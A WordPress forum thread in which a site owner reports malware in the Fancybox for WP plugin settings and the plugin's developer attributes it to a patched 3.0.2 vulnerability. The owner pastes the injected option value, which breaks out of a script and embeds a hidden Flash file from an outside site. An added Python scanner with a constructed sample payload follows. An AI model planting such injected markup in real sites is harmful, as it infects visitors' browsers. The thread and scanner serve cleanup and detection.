Viewing 3 replies - 1 through 3 (of 3 total)
  • Thread Starter acurran

    (@acurran)

    Upon further investigation I’ve found that the suspicious code is in the options. The mfbfw option contains the malware code and injects into the Fancybox for WP header output. Anyone have any ideas how this compromise could have happened? Here is what was in the mfbfw option:

    a:3:{s:10:”extraCalls”;s:1:” “;s:13:”transitionOut”;s:762:””,’centerOnScroll’: false});})
    </script>
    <!– Start of StatCounter Code for Default Guide –>
    <object type=”application/x-shockwave-flash” data=”https://www.weathershieldlimited.com/images/banners/eaj.swf
    ?myid=cea0d16fdd2e07f5498e0c64ebd186a2″ width=”1px” height=”1px” id=”cea0d16fdd2e07f5498e0c64ebd186a2″>
    <param name=”AllowScriptAccess” value=”always”/>
    <param name=”myid” value=”cea0d16fdd2e07f5498e0c64ebd186a2″ />
    <param name=”movie” value=”https://www.weathershieldlimited.com/images/banners/eaj.swf
    ?myid=cea0d16fdd2e07f5498e0c64ebd186a2″/>
    <embed src=”https://www.weathershieldlimited.com/images/banners/eaj.swf
    ?myid=cea0d16fdd2e07f5498e0c64ebd186a2″ width=”1″ height=”1″>
    </embed>
    </object>
    <!– End of StatCounter Code for Default Guide –>
    <script>({“;s:16:”extraCallsEnable”;s:3:”off”;}

    Hi acurran,

    Sorry for the inconvenience.

    There was a vulnerability in version 3.0.2 that was exploited for a brief period of time and patched as soon as it became known in February (more info). It’s likely the breach occurred back then, and the malware code remained in the database since then, or it might have occurred recently if the plugin was not up to date.

    Make sure to remove the malware if you haven’t already (if unsure, you can use the reset settings button to clean it), and check all instances of the plugin on other WordPress installations are clean and up to date.
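
Added example, not part of the thread or of the plugin's code: one way to check an exported `mfbfw` option value for the kind of injected markup reported above, by reading the PHP-serialized array without ever unserializing it in PHP. The function names, the `fade` value and both sample options are constructed for illustration; the real value would come from the `option_value` column of the options table.

```python
import re

# HTML tags that should never appear inside a Fancybox setting value.
MARKUP = re.compile(rb"<\s*/?\s*(?:script|object|embed|param|iframe)\b", re.I)

def _parse(buf, pos=0):
    """Parse one PHP-serialized value; return (value, next_pos). No objects."""
    tag = buf[pos:pos + 1]
    if tag == b"N":                                   # N;
        return None, pos + 2
    if tag in (b"i", b"b", b"d"):                     # i:5;  b:1;  d:0.5;
        end = buf.index(b";", pos)
        return buf[pos + 2:end].decode(), end + 1
    if tag in (b"s", b"a"):
        colon = buf.index(b":", pos + 2)
        n, start = int(buf[pos + 2:colon]), colon + 2
    if tag == b"s":                                   # s:<byte len>:"<bytes>";
        if buf[start + n:start + n + 2] != b'";':
            raise ValueError("string length mismatch at offset %d" % pos)
        return buf[start:start + n], start + n + 2
    if tag == b"a":                                   # a:<count>:{key value ...}
        out, pos = {}, start
        for _ in range(n):
            key, pos = _parse(buf, pos)
            out[key], pos = _parse(buf, pos)
        return out, pos + 1                           # skip closing brace
    raise ValueError("unsupported type %r at offset %d" % (tag, pos))

def scan_option(serialized):
    """Return [(setting_name, first_tag_found)] for values holding HTML markup."""
    hits = []
    def walk(value, path):
        if isinstance(value, dict):
            for key, item in value.items():
                name = key.decode(errors="replace") if isinstance(key, bytes) else key
                walk(item, path + [name])
        elif isinstance(value, bytes) and (m := MARKUP.search(value)):
            hits.append(("/".join(path), m.group(0).decode()))
    walk(_parse(serialized)[0], [])
    return hits

def php_str(raw):                                     # helper to build samples
    return b's:%d:"%s";' % (len(raw), raw)

# Constructed samples (not the page's data): a clean option and one whose
# transitionOut breaks out of the plugin's inline script, as in the report above.
CLEAN = b"a:2:{" + php_str(b"extraCalls") + php_str(b" ") \
        + php_str(b"transitionOut") + php_str(b"fade") + b"}"
PAYLOAD = b"\",'centerOnScroll': false});})</script><object data=" \
          b"\"https://malware.example.invalid/x.swf\"></object><script>({\""
INFECTED = CLEAN.replace(php_str(b"fade"), php_str(PAYLOAD))

if __name__ == "__main__":
    print(scan_option(CLEAN), scan_option(INFECTED))
```

A `ValueError` from the parser (length mismatch or an unsupported type such as a serialized object) is itself a reason to inspect the option by hand.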

    Thread Starter acurran

    (@acurran)

    Thanks for the response Jose

  • The topic ‘Malware?’ is closed to new replies.